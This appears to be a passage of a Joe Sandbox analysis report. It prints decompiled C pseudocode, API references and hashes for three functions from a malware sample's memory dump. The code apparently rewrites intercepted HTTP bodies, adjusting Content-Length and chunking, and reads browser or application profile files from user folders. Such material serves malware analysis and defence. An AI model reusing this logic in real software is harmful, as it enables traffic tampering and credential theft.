Instruction Fuzzy Hash: 2AF0B4B1B803147BCB30AB76AC85E673FE8B785B50754003BFA00A71B2C67A4042DE1C

Uniqueness

Uniqueness Score: -1.00%

Function 00406131 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 248
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00406131(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v20;
				void* _v24;
				void* _v28;
				char _v36;
				char _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v72;
				void* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t99;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;
				void* _t104;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				intOrPtr _t119;
				void* _t131;
				signed int _t139;
				void* _t149;
				struct _CRITICAL_SECTION* _t153;
				intOrPtr _t155;
				intOrPtr _t167;
				signed int _t169;
				signed int _t175;
				char _t177;
				void* _t178;
				intOrPtr _t180;
				signed int _t183;
				intOrPtr _t186;
				void* _t188;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;
				signed int _t195;
				void* _t197;
				void* _t199;

				_t197 = (_t195 & 0xfffffff8) - 0x34;
				_t99 = E00419F02();
				_t180 = _a4;
				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
					L42:
					_t100 =  *0x4203e4(_t180, _a8, _a12);
					goto L43;
				} else {
					_t153 = 0x4203c0;
					EnterCriticalSection(0x4203c0);
					_t101 = E0040551F(_t180);
					if(_t101 == 0xffffffff) {
						L41:
						LeaveCriticalSection(_t153);
						goto L42;
					}
					_t103 = _t101 * 0x38 +  *0x4203dc;
					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
						L32:
						_t183 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
						__eflags = _a12 - _t183;
						if(_a12 < _t183) {
							_t183 = _a12;
						}
						_t87 = _t103 + 0x2c; // -4326320
						_t174 = _t87;
						_t104 = E004086CB(_a8,  *_t87 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
							E0040868F( *_t174);
							E00408730(_t174, 0xc);
						}
						LeaveCriticalSection(_t153);
						_t100 = _t183;
						L43:
						return _t100;
					}
					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
						goto L41;
					}
					LeaveCriticalSection(0x4203c0);
					_t107 =  *0x4203e4(_t180, _a8, _a12);
					_t199 = _t197 + 0xc;
					_v52 = _t107;
					if(_t107 <= 0xffffffff) {
						L40:
						_t100 = _v52;
						goto L43;
					}
					EnterCriticalSection(0x4203c0);
					_t108 = E0040551F(_t180);
					_t175 = _t108;
					if(_t175 == 0xffffffff) {
						L37:
						_push(8);
						_push(0xffffe890);
						L38:
						 *0x4203bc();
						_v52 = _v52 | 0xffffffff;
						L39:
						LeaveCriticalSection(_t153);
						goto L40;
					}
					_t169 = _v52;
					if(_t169 == 0) {
						L11:
						_t177 = _t175 * 0x38 +  *0x4203dc;
						_v36 = _t177;
						if(_t169 > 0) {
							E004086CB( *((intOrPtr*)(_t177 + 0x14)) +  *((intOrPtr*)(_t177 + 0x18)), _a8, _t169);
							 *((intOrPtr*)(_t177 + 0x18)) =  *((intOrPtr*)(_t177 + 0x18)) + _t169;
						}
						_t110 = E00405D50(_t156,  &_v20,  *((intOrPtr*)(_t177 + 0x14)),  *((intOrPtr*)(_t177 + 0x18)));
						_v52 = _t110;
						if(_t110 == 1) {
							_t119 = E00405EF8( &_v20,  *((intOrPtr*)(_t177 + 0x18)),  *((intOrPtr*)(_t177 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
							_v60 = _t119;
							if(_t119 == 1) {
								if(E004126FA( *((intOrPtr*)(_t177 + 0x10)),  *((intOrPtr*)(_t177 + 0xc)),  *((intOrPtr*)(_t177 + 4)),  &_v48,  &_v40) != 0) {
									_t155 = _v40;
									_t186 = E0040865F( *((intOrPtr*)(_t177 + 0x18)) -  *((intOrPtr*)(_t199 + 0x3c)) +  *((intOrPtr*)(_t199 + 0x38)) + _t155 + 0x14);
									_v40 = _t186;
									if(_t186 != 0) {
										_t131 = E004086CB(_t186,  *((intOrPtr*)(_t177 + 0x14)),  *((intOrPtr*)(_t199 + 0x38)));
										_push(_t155);
										if(( *(_t199 + 0x30) & 0x00000002) == 0) {
											E00408E5C(_t199 + 0x28);
											_t188 = E0040D704(_t186,  *((intOrPtr*)(_t199 + 0x40)), "Content-Length",  &_v36) + _v60;
											E004086CB(_t188,  *((intOrPtr*)(_t199 + 0x18)), _t155);
											_t189 = _t188 + _t155;
											__eflags = _t189;
										} else {
											_push("%x\r\n");
											_t191 = _t186 + _t131;
											_t178 = 0xd;
											_t192 = _t191 + E00409494(_t131, _t178, _t191);
											E004086CB(_t192, _v48, _t155);
											_t193 = _t192 + _t155;
											E004086CB(_t193, "\r\n0\r\n\r\n", 7);
											_t177 = _v60;
											_t189 = _t193 + 7;
										}
										_t137 =  *((intOrPtr*)(_t177 + 0x18));
										if( *((intOrPtr*)(_t199 + 0x3c)) !=  *((intOrPtr*)(_t177 + 0x18))) {
											_t189 = _t189 + E004086CB(_t189,  *((intOrPtr*)(_t177 + 0x14)) +  *((intOrPtr*)(_t199 + 0x3c)), _t137 -  *((intOrPtr*)(_t199 + 0x3c)));
										}
										E0040868F( *((intOrPtr*)(_t177 + 0x14)));
										_t139 = _v44;
										 *((intOrPtr*)(_t177 + 0x14)) = _t139;
										 *((intOrPtr*)(_t177 + 0x18)) = _t189 - _t139;
									}
								}
								_v44 = _v44 | 0xffffffff;
								E0040868F(_v48);
							}
							_t153 = 0x4203c0;
						}
						if(_v52 <= 0) {
							L29:
							if(__eflags == 0) {
								L31:
								 *((intOrPtr*)(_t177 + 0x2c)) =  *((intOrPtr*)(_t177 + 0x14));
								 *((intOrPtr*)(_t177 + 0x30)) =  *((intOrPtr*)(_t177 + 0x18));
								 *((intOrPtr*)(_t177 + 0x34)) = 0;
								 *((intOrPtr*)(_t177 + 0x14)) = 0;
								 *((intOrPtr*)(_t177 + 0x18)) = 0;
								E00412BFC( *((intOrPtr*)(_t177 + 0x10)),  *((intOrPtr*)(_t177 + 0xc)));
								_t103 = _v40;
								 *((intOrPtr*)(_t177 + 0x10)) = 0;
								 *((intOrPtr*)(_t177 + 0xc)) = 0;
								goto L32;
							}
							__eflags = _v44 - 0xffffffff;
							if(_v44 != 0xffffffff) {
								goto L39;
							}
							goto L31;
						} else {
							if(_v44 != 0) {
								__eflags = _v52;
								goto L29;
							}
							_push(0);
							_push(0xffffe892);
							goto L38;
						}
					}
					_t167 =  *0x4203dc; // 0x0
					_t149 = _t108 * 0x38 + _t167;
					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t169;
					_t11 = _t149 + 0x14; // 0x14
					if(E0040861A( *((intOrPtr*)(_t149 + 0x18)) + _t169, _t11) == 0) {
						goto L37;
					}
					_t169 = _v52;
					goto L11;
				}
			}

0x00406137
0x0040613d
0x00406142
0x00406147
0x00406435
0x0040643c
0x00000000
0x00406161
0x00406167
0x0040616d
0x0040616f
0x00406177
0x0040642e
0x0040642f
0x00000000
0x0040642f
0x00406180
0x0040618a
0x004063c8
0x004063cb
0x004063ce
0x004063d1
0x004063d3
0x004063d3
0x004063d6
0x004063d6
0x004063e3
0x004063e8
0x004063ee
0x004063f1
0x004063f5
0x004063fd
0x004063fd
0x00406403
0x00406409
0x00406445
0x0040644b
0x0040644b
0x00406194
0x00000000
0x00000000
0x0040619b
0x004061a8
0x004061ae
0x004061b4
0x004061b8
0x00406428
0x00406428
0x00000000
0x00406428
0x004061bf
0x004061c1
0x004061c6
0x004061cb
0x0040640d
0x0040640d
0x0040640f
0x00406414
0x00406414
0x0040641a
0x00406421
0x00406422
0x00000000
0x00406422
0x004061d1
0x004061d7
0x004061fd
0x00406200
0x00406206
0x0040620c
0x00406219
0x0040621e
0x0040621e
0x0040622b
0x00406230
0x00406237
0x0040625b
0x00406260
0x00406267
0x00406287
0x00406294
0x004062a5
0x004062a7
0x004062ad
0x004062bc
0x004062c6
0x004062c7
0x00406303
0x00406323
0x00406328
0x0040632d
0x0040632d
0x004062c9
0x004062c9
0x004062d0
0x004062d2
0x004062df
0x004062e2
0x004062ee
0x004062f1
0x004062f6
0x004062fa
0x004062fa
0x0040632f
0x00406336
0x0040634b
0x0040634b
0x00406350
0x00406355
0x0040635b
0x0040635e
0x0040635e
0x004062ad
0x00406365
0x0040636a
0x0040636a
0x0040636f
0x0040636f
0x0040637a
0x00406391
0x00406391
0x0040639e
0x004063a4
0x004063aa
0x004063b0
0x004063b3
0x004063b6
0x004063b9
0x004063be
0x004063c2
0x004063c5
0x00000000
0x004063c5
0x00406393
0x00406398
0x00000000
0x00000000
0x00000000
0x0040637c
0x00406380
0x0040638d
0x00000000
0x0040638d
0x00406382
0x00406383
0x00000000
0x00406383
0x0040637a
0x004061d9
0x004061e2
0x004061e7
0x004061e9
0x004061f3
0x00000000
0x00000000
0x004061f9
0x00000000
0x004061f9

APIs

Part of subcall function 00419F02: WaitForSingleObject.KERNEL32(00000000,0040506D,00405103,00000000), ref: 00419F0A

EnterCriticalSection.KERNEL32(004203C0), ref: 0040616D
LeaveCriticalSection.KERNEL32(004203C0), ref: 0040619B
EnterCriticalSection.KERNEL32(004203C0), ref: 004061BF
LeaveCriticalSection.KERNEL32(004203C0,00000000,?,?), ref: 00406403
LeaveCriticalSection.KERNEL32(004203C0), ref: 00406422

Part of subcall function 0040D704: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-004203DC,?,00000000), ref: 0040D75E

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

LeaveCriticalSection.KERNEL32(004203C0), ref: 0040642F

Strings

%x, xrefs: 004062C9
0, xrefs: 004062E9
Content-Length, xrefs: 0040630D

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
String ID: 0$%x$Content-Length
API String ID: 4067213518-3838797520
Opcode ID: 8cb45b177ce4e3b0d7e218b527b4773af03e3d35fa02286cd69899fd2a285724
Instruction ID: 2794c116377522690c2a06c5c205a35d620e23243388d132143f813430ad9258
Opcode Fuzzy Hash: 8cb45b177ce4e3b0d7e218b527b4773af03e3d35fa02286cd69899fd2a285724
Instruction Fuzzy Hash: 2891BF71500212AFC710EF25C98196ABBF5FF54314F054A2EF851A72E2CB38E965CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 004126FA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 366
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004126FA(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				char _v540;
				char _v800;
				char _v804;
				char _v860;
				char _v864;
				struct _SYSTEMTIME _v880;
				char _v892;
				char _v900;
				signed int _v968;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				char* _v992;
				char _v995;
				char _v996;
				char _v1000;
				void* _v1008;
				struct _SYSTEMTIME _v1028;
				signed int _v1032;
				short _v1036;
				signed short* _v1040;
				signed int _v1044;
				intOrPtr* _v1048;
				signed int _v1052;
				void* _v1056;
				signed int _v1060;
				signed int _v1064;
				char _v1068;
				intOrPtr _v1072;
				char _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t155;
				signed int _t156;
				intOrPtr _t157;
				signed int _t165;
				void* _t184;
				void* _t195;
				signed int _t207;
				signed int _t212;
				signed int _t215;
				signed char _t219;
				signed int _t221;
				void* _t224;
				void* _t225;
				signed int _t226;
				signed int _t227;
				signed int _t237;
				void* _t239;
				signed int _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t255;
				void* _t278;
				intOrPtr* _t285;
				signed int _t290;
				long _t293;
				signed short* _t295;
				signed short* _t297;
				signed int _t300;
				intOrPtr* _t302;
				signed int _t306;
				void* _t308;

				_t308 = (_t306 & 0xfffffff8) - 0x424;
				_v1032 = _v1032 & 0x00000000;
				if(__eax <= 0) {
					L50:
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					_t285 = __ecx + 0x10;
					_v1048 = _t285;
					_v1028.wDayOfWeek = __eax;
					do {
						_t255 =  *_t285;
						_t277 =  *(_t285 - 0x10) >> 0x0000000a & 0x00000008;
						_v1028.wHour = _t277;
						if(_t255 == 0) {
							_t251 = _a8;
							L6:
							_t256 =  *(_t285 + 4);
							_v1052 = _v1052 & 0x00000000;
							_v1064 = _v1064 & 0x00000000;
							_t155 =  *((intOrPtr*)(_t285 + 8)) + _t256;
							_v1028.wSecond = _t155;
							if(_t256 >= _t155) {
								L35:
								_t156 =  *(_t285 - 0x10);
								_t293 = 0;
								if((_t156 & 0x00000008) != 0 && _v1052 != 0) {
									if((_t156 & 0x00000200) == 0) {
										_t252 = E004088D2(_t156 | 0xffffffff, 0, _a4);
										__eflags = _t252;
										if(_t252 != 0) {
											_t184 = 5;
											E00412F05(_t184,  &_v996);
											_push(_v1052);
											E00413AE4(_t256, _t277, __eflags, 0xc9, _t252, 0,  &_v996, _t252);
											_t308 = _t308 + 0x18;
											E0040868F(_t252);
										}
									} else {
										_t278 = 0x3c;
										E00408742( &_v996,  &_v996, 0, _t278);
										_v992 =  &_v800;
										_v1008 = _t278;
										_v988 = 0x103;
										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
											GetSystemTime( &_v1028);
											_t305 =  &(_v880.wDayOfWeek);
											_t195 = 4;
											E00412F05(_t195,  &(_v880.wDayOfWeek));
											_push(_v1028.wDay & 0x0000ffff);
											_push(_v1028.wMonth & 0x0000ffff);
											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
											_push( &_v804);
											E00409450( &(_v880.wDayOfWeek), 0x104,  &_v540, _t305);
											_t308 = _t308 + 0x14;
											E0041393A(_t256, 0x104, 2, 0,  &_v540, _v1068, _v1080);
											_t285 = _v1084;
										}
									}
									E0040868F(_v1052);
									_t293 = 0;
								}
								if( *((intOrPtr*)(_t285 - 4)) != _t293) {
									if(( *(_t285 - 0x10) & 0x00000010) == 0) {
										EnterCriticalSection(0x421234);
										E0040868F( *0x42124c);
										_t165 = E00408AEF(E0040868F( *0x421250) | 0xffffffff,  *((intOrPtr*)(_t285 - 0xc)));
										 *0x42124c = _t165;
										__eflags = _t165 | 0xffffffff;
										 *0x421250 = E00408AEF(_t165 | 0xffffffff,  *((intOrPtr*)(_t285 - 4)));
										LeaveCriticalSection(0x421234);
									} else {
										E0041A16E( &_v860, _t256, 1,  &_v996);
										if(E00409A27( &_v900,  *((intOrPtr*)(_t285 - 4)), E004092EF( *((intOrPtr*)(_t285 - 4)))) != 0) {
											E00408F4C( &_v860,  &_v892);
											GetLocalTime( &_v880);
											E0040C93C( &_v860,  &_v1000,  &_v864, 3,  &_v880, 0x10);
										}
									}
								}
								goto L49;
							} else {
								goto L9;
								L13:
								_t277 =  *_t207 & 0x0000ffff;
								if(_t277 != 4) {
									_t256 = _t207 + 4;
									_t215 = E00411ADD(_v1028.wHour, _t207 + 4, 0,  &_v1056, (_t277 & 0x0000ffff) - 4,  *_t251 + _v1060,  *_a12 - _v1060);
									__eflags = _t215;
									if(_t215 == 0) {
										goto L33;
									} else {
										__eflags =  *_v1036 - 4;
										_t297 = _v1040;
										if( *_v1036 != 4) {
											_t52 =  &_v1056;
											 *_t52 = _v1056 + _v1060;
											__eflags =  *_t52;
										} else {
											_v1060 = _v1056;
										}
										goto L22;
									}
								} else {
									if( *_t256 != _t277) {
										_t247 = _v1060;
									} else {
										_t247 =  *_a12;
									}
									_v1056 = _t247;
									L22:
									_t256 = _v1056 - _v1060;
									_t219 =  *(_v1048 - 0x10);
									_t290 = ( *_t297 & 0x0000ffff) - 4;
									_v1044 = _t256;
									if((_t219 & 0x00000004) == 0) {
										__eflags = _t219 & 0x00000008;
										if((_t219 & 0x00000008) != 0) {
											_t221 = E0040861A(_t256 + _t290 + _v1064 + 2,  &_v1052);
											__eflags = _t221;
											if(_t221 != 0) {
												_t300 = _v1052;
												__eflags = _t290;
												if(_t290 > 0) {
													E004086CB(_v1064 + _t300,  &(_v1040[2]), _t290);
													_t82 =  &_v1076;
													 *_t82 = _v1076 + _t290;
													__eflags =  *_t82;
												}
												_t277 = _v1044;
												_t224 = E004086CB(_v1064 + _t300,  *_t251 + _v1060, _t277);
												_t256 = _v1060;
												__eflags =  *(_t256 - 0x10) & 0x00000100;
												if(( *(_t256 - 0x10) & 0x00000100) == 0) {
													_t225 = E0040D388(_t224, _t277);
													_t93 =  &_v1068;
													 *_t93 = _v1068 + _t225;
													__eflags =  *_t93;
													_t251 = _a8;
												} else {
													_v1064 = _v1064 + _t277;
												}
												_t226 = _v1064;
												 *((char*)(_t226 + _t300)) = 0xa;
												_t227 = _t226 + 1;
												__eflags = _t227;
												_v1064 = _t227;
												 *((char*)(_t227 + _t300)) = 0;
											}
										}
									} else {
										_v1036 =  *_a12 - _t256 + _t290;
										_t237 = E0040865F( *_a12 - _t256 + _t290);
										_v1044 = _t237;
										if(_t237 != 0) {
											_t277 = _v1060;
											_t239 = E004086CB(E004086CB(_t237,  *_t251, _v1060) + _v1060,  &(_t297[2]), _t290);
											_t302 = _a12;
											_t256 =  *_t251 + _v1080;
											E004086CB(_t239 + _t290 + _v1060,  *_t251 + _v1080,  *_t302 - _v1080);
											E0040868F( *_t251);
											_v1072 = _v1072 + 1;
											 *_t251 = _v1084;
											 *_t302 = _v1076;
										}
									}
									L33:
									if(_v1028.wYear < _v1028.wSecond) {
										_t256 = _v1028.wYear;
										L9:
										_t207 = ( *_t256 & 0x0000ffff) + _t256;
										_t295 = ( *_t207 & 0x0000ffff) + _t207;
										_v1028.wYear = _t295 + ( *_t295 & 0x0000ffff);
										_t277 =  *_t256 & 0x0000ffff;
										_v1036 = _t256;
										_v1044 = _t207;
										_v1040 = _t295;
										if(( *_t256 & 0x0000ffff) != 4) {
											goto L11;
										} else {
											_v1060 = _v1060 & 0x00000000;
											goto L13;
										}
									}
									_t285 = _v1048;
									goto L35;
								}
								L11:
								_t212 = E00411ADD(_v1028.wHour, _t256,  &_v1060, 0, (_t277 & 0x0000ffff) - 4,  *_t251,  *_a12);
								__eflags = _t212;
								if(_t212 == 0) {
									goto L33;
								} else {
									_t297 = _v1040;
									_t207 = _v1044;
									_t256 = _v1036;
									goto L13;
								}
							}
						}
						_v995 = 0x2a;
						_v996 = 0x3f;
						_v992 = _t255;
						_t157 = E004092EF(_t255);
						_t251 = _a8;
						_v988 = _t157;
						_v984 =  *_t251;
						_t277 = _t277 | 0x00000012;
						_v980 =  *_a12;
						_v968 = _t277;
						if(E00409701( &_v996) != 0) {
							goto L6;
						}
						L49:
						_t285 = _t285 + 0x1c;
						_t147 =  &(_v1028.wDayOfWeek);
						 *_t147 = _v1028.wDayOfWeek - 1;
						_v1048 = _t285;
					} while ( *_t147 != 0);
					goto L50;
				}
			}

0x00412700
0x00412706
0x00412710
0x00412b97
0x00412b9e
0x00412ba7
0x00412716
0x00412718
0x0041271b
0x0041271f
0x00412723
0x00412726
0x0041272b
0x0041272e
0x00412734
0x00412779
0x0041277c
0x0041277c
0x00412782
0x00412787
0x0041278c
0x0041278e
0x00412794
0x0041299e
0x0041299e
0x004129a1
0x004129a5
0x004129ba
0x00412a7f
0x00412a81
0x00412a83
0x00412a8b
0x00412a8c
0x00412a91
0x00412aa1
0x00412aa6
0x00412aaa
0x00412aaa
0x004129c0
0x004129c2
0x004129ca
0x004129d6
0x004129e4
0x004129e8
0x004129f9
0x00412a0e
0x00412a16
0x00412a1d
0x00412a1e
0x00412a28
0x00412a2e
0x00412a39
0x00412a41
0x00412a51
0x00412a56
0x00412a68
0x00412a6d
0x00412a6d
0x004129f9
0x00412ab3
0x00412ab8
0x00412ab8
0x00412abd
0x00412ac7
0x00412b43
0x00412b4f
0x00412b65
0x00412b6a
0x00412b72
0x00412b7b
0x00412b80
0x00412ac9
0x00412ad7
0x00412af5
0x00412b0a
0x00412b17
0x00412b36
0x00412b36
0x00412af5
0x00412ac7
0x00000000
0x0041279a
0x0041279a
0x00412803
0x00412803
0x0041280a
0x00412840
0x00412847
0x0041284c
0x0041284e
0x00000000
0x00412854
0x00412858
0x0041285c
0x00412860
0x00412870
0x00412870
0x00412870
0x00412862
0x00412866
0x00412866
0x00000000
0x00412860
0x0041280c
0x0041280f
0x00412818
0x00412811
0x00412814
0x00412814
0x0041281c
0x00412874
0x0041287f
0x00412883
0x00412886
0x00412889
0x0041288f
0x00412901
0x00412903
0x00412917
0x0041291c
0x0041291e
0x00412920
0x00412924
0x00412926
0x00412938
0x0041293d
0x0041293d
0x0041293d
0x0041293d
0x00412943
0x00412954
0x00412959
0x0041295d
0x00412964
0x0041296f
0x00412974
0x00412974
0x00412974
0x00412978
0x00412966
0x00412966
0x00412966
0x0041297b
0x0041297f
0x00412983
0x00412983
0x00412984
0x00412988
0x00412988
0x0041291e
0x00412891
0x0041289a
0x0041289e
0x004128a3
0x004128a9
0x004128af
0x004128c5
0x004128ca
0x004128d8
0x004128e0
0x004128e7
0x004128f0
0x004128f4
0x004128fa
0x004128fa
0x004128a9
0x0041298c
0x00412994
0x0041279c
0x004127a0
0x004127a3
0x004127a8
0x004127af
0x004127b3
0x004127b6
0x004127ba
0x004127be
0x004127c6
0x00000000
0x004127c8
0x004127c8
0x00000000
0x004127c8
0x004127c6
0x0041299a
0x00000000
0x0041299a
0x004127cf
0x004127ea
0x004127ef
0x004127f1
0x00000000
0x004127f7
0x004127f7
0x004127fb
0x004127ff
0x00000000
0x004127ff
0x004127f1
0x00412794
0x00412736
0x0041273b
0x00412740
0x00412744
0x00412749
0x0041274c
0x00412752
0x0041275b
0x00412762
0x00412766
0x00412771
0x00000000
0x00412777
0x00412b86
0x00412b86
0x00412b89
0x00412b89
0x00412b8d
0x00412b8d
0x00000000
0x00412723

APIs

InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 004129F0
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 00412A0E
GetLocalTime.KERNEL32(?,?,?,?,00000000,00000001,?,-004203DC,?,?), ref: 00412B17
EnterCriticalSection.KERNEL32(00421234,-004203DC,?,?), ref: 00412B43
LeaveCriticalSection.KERNEL32(00421234,?,00000000), ref: 00412B80

Strings

?, xrefs: 0041273B
*, xrefs: 00412736

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
String ID: *$?
API String ID: 2400141425-2367018687
Opcode ID: a0ce310730fa6951c48bd19071635d2780a776f3f320d3bcab766f3bfd5a0411
Instruction ID: dffcf1905cdedab8c9bf8947eeecc842e042eb0e5545e52b3f7c533c0da614bc
Opcode Fuzzy Hash: a0ce310730fa6951c48bd19071635d2780a776f3f320d3bcab766f3bfd5a0411
Instruction Fuzzy Hash: 7FE1BEB16083419FC710DF69C940AABB7E4FF88314F044A2EF894E7291D778E950CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00417709 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00417709(char* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v64;
				char _v84;
				char _v108;
				char _v152;
				char _v180;
				char _v252;
				short _v766;
				char _v772;
				short _v1292;
				void* __edi;
				void* __esi;
				void* _t46;
				void* _t48;
				void* _t53;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t68;
				void* _t70;
				void* _t75;
				WCHAR* _t100;
				signed int _t101;
				WCHAR* _t103;
				char* _t108;
				intOrPtr _t109;
				void* _t112;
				intOrPtr _t125;

				_t99 = __edx;
				_t98 = __ecx;
				E00408742( &_v12,  &_v12, 0, 8);
				_t46 = 0x40;
				E00412F05(_t46,  &_v252);
				_t48 = 0x41;
				E00412F05(_t48,  &_v108);
				_t100 =  &_v772;
				_t53 = E0040C7E3(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
				if(_t53 != 0xffffffff) {
					_t115 = _t53;
					if(_t53 > 0) {
						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
						E00417518(_t99, _t115,  &_v1292,  &_v12);
						PathRemoveFileSpecW( &_v1292);
					}
				}
				_t101 = 0;
				if(_v8 != 0) {
					L14:
					_t125 = _v8;
					goto L15;
				} else {
					_t57 = 0x43;
					E00412F05(_t57,  &_v64);
					_t59 = 0x44;
					E00412F05(_t59,  &_v152);
					_t108 =  &_v84;
					_t61 = 0x45;
					E00412F05(_t61, _t108);
					_v24 =  &_v64;
					_v20 =  &_v152;
					_v40 = 0x24;
					_v36 = 0x1a;
					_v32 = 0x26;
					_v28 = 0x23;
					_v16 = _t108;
					do {
						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
						if(0 == 0) {
							_t118 = _t109 - 0x24;
							if(_t109 == 0x24) {
								E004174D6(_t118,  &_v772,  &_v12, 0);
								_v766 = 0;
							}
							_t99 =  &_v24;
							_t98 =  &_v772;
							E0040DE68( &_v772,  &_v24, 0, 3, 2, E004176C0,  &_v12, 0, 0, 0);
						}
						_t101 = _t101 + 1;
					} while (_t101 < 4);
					if(_v8 != 0) {
						L15:
						if(_t125 <= 0) {
							return E0040868F(_v12);
						}
						_push(0x46);
						return E00416E46(_t99, _v12);
					}
					_t68 = 0x40;
					E00412F05(_t68,  &_v180);
					_t70 = 0x42;
					E00412F05(_t70,  &_v64);
					_t103 =  &_v772;
					_t75 = E0040C7E3(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
					if(_t75 != 0xffffffff) {
						_t124 = _t75;
						if(_t75 > 0) {
							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
							E004174D6(_t124,  &_v1292,  &_v12, 1);
						}
					}
					goto L14;
				}
			}

0x00417709
0x00417709
0x0041771d
0x0041772a
0x0041772b
0x00417735
0x00417736
0x0041774b
0x00417756
0x0041775e
0x00417760
0x00417762
0x0041776f
0x00417780
0x0041778c
0x0041778c
0x00417762
0x00417792
0x00417797
0x004178b7
0x004178b7
0x00000000
0x0041779d
0x004177a2
0x004177a3
0x004177b0
0x004177b1
0x004177b8
0x004177bb
0x004177bc
0x004177c4
0x004177cd
0x004177d2
0x004177d9
0x004177e0
0x004177e7
0x004177ee
0x004177f1
0x004177f1
0x00417802
0x0041780a
0x0041780c
0x0041780f
0x0041781d
0x00417824
0x00417824
0x0041783d
0x00417840
0x00417846
0x00417846
0x0041784b
0x0041784c
0x00417855
0x004178bb
0x004178bb
0x00000000
0x004178cd
0x004178c0
0x00000000
0x004178c3
0x0041785f
0x00417860
0x0041786a
0x0041786b
0x0041787b
0x00417886
0x0041788e
0x00417890
0x00417892
0x0041789f
0x004178b2
0x004178b2
0x00417892
0x00000000
0x0041788e

APIs

Part of subcall function 0040C7E3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,00406E71,?,?,00000104), ref: 0040C7F8

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0041776F

Part of subcall function 00417518: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0041754F
Part of subcall function 00417518: StrStrIW.SHLWAPI(?,?), ref: 004175DC
Part of subcall function 00417518: StrStrIW.SHLWAPI(?,?), ref: 004175ED
Part of subcall function 00417518: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00417609
Part of subcall function 00417518: GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00417627

PathRemoveFileSpecW.SHLWAPI(?), ref: 0041778C

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 00417802
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 0041789F

Strings

$, xrefs: 004177D2
#, xrefs: 004177E7
&, xrefs: 004177E0

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin
